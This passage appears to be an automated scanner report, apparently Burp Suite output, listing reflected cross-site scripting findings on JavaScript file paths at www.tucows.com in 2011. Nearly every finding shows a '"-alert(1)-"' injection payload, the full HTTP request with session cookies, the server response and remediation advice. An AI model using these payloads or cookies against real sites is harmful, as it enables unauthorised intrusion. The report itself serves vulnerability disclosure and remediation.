<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0d6e"-alert(1)-"900705e6011 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/jsf0d6e"-alert(1)-"900705e6011/ajaxlib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:53 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72931"-alert(1)-"45543eb08c1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/ajaxlib.js72931"-alert(1)-"45543eb08c1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:04 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.267. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/includes/js/ajaxlib.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4c98"-alert(1)-"3068e25c5c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/ajaxlib.js?d4c98"-alert(1)-"3068e25c5c8=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:09 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fca30"-alert(1)-"22e394819af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imagesfca30"-alert(1)-"22e394819af/newassets/includes/js/show_layer.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:20 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a833"-alert(1)-"f1b3a80e89c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets5a833"-alert(1)-"f1b3a80e89c/includes/js/show_layer.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:28 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be914"-alert(1)-"d7583b93b1f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includesbe914"-alert(1)-"d7583b93b1f/js/show_layer.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:38 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 254cc"-alert(1)-"7ef9881c0ed was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js254cc"-alert(1)-"7ef9881c0ed/show_layer.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:50 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aae9e"-alert(1)-"0ee85bcbea6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/show_layer.jsaae9e"-alert(1)-"0ee85bcbea6 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:59 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.273. http://www.tucows.com/images/newassets/includes/js/show_layer.js [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/includes/js/show_layer.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b38f6"-alert(1)-"339c2aebf39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/show_layer.js?b38f6"-alert(1)-"339c2aebf39=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:06 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3b50"-alert(1)-"b444dbcbd88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imagesf3b50"-alert(1)-"b444dbcbd88/newassets/includes/js/signupin.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:56 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d53eb"-alert(1)-"62bf072695 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassetsd53eb"-alert(1)-"62bf072695/includes/js/signupin.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:07 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c81a"-alert(1)-"2b1a48bb558 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes3c81a"-alert(1)-"2b1a48bb558/js/signupin.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:21 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8017"-alert(1)-"b67c8ffcb4e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/jse8017"-alert(1)-"b67c8ffcb4e/signupin.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
